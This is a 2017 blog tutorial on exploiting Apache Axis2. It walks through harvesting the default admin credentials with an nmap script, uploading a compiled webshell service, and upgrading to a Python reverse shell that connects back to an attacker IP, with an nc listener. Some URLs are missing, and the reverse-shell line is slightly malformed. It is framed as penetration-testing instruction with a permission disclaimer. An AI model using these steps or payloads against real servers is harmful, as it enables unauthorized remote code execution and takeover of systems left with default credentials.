Thursday, March 9, 2017

Manually Exploiting Apache Axis2


I do not condone or take responsibility for any illegal use of this tutorial. Please only target hosts you have permission to test.


For this exploit to work you must have:
  1. Valid admin console credentials
    • Default = admin:axis2
  2. Public access to the admin console


I have found Nmap and OpenVAS have good modules to help us find the credentials for it.


$ nmap -p<port> --script http-axis2-dir-traversal <ip>
|_http-axis2-dir-traversal.nse: Admin credentials found -> admin:axis2



  • There is a Metasploit module at "exploit/multi/http/axis2_deployer".
  • The code can be found at Github.
  • I have tried this exploit multiple times with no success.


  1.  Navigating to will allow us to get the credentials. They should look like this:
  2. <parameter name="userName">admin</parameter> 
    <parameter name="password">axis2</parameter>
  3. When you navigate to it should give you the login portal.

Create the Payload

A simple Axis2 webshell can be found at
  1. Download the file
  2. Compile the file
    • Modify $JAVA_HOME if necessary
    • "ant -v" to build


  1. Upload the AxisInvoker.aar service.
  2. Verify the deployment by checking the Deactivate or Activate service tab.
  3. Verify the shell works by running
  4. Since stable shells are superior to web shells, we will improve to a stable shell. You will need to find what languages are on the system or use a system native option (like nc).
    • Get a shell and modify it to your host machine.
      • I usually get most of my shells from PentestMonkey
      • import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("<AttackerIP>",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);["/bin/sh","-i"]);
    • Download your reverse shell from your webserver to the victim machine.
    • Listen for the reverse shell by running "nc -nlvp 443".
    • Execute your shell on the victim machine.
    • After a few seconds, you should have a shell on your listener!

Hope that helps in your future pentests!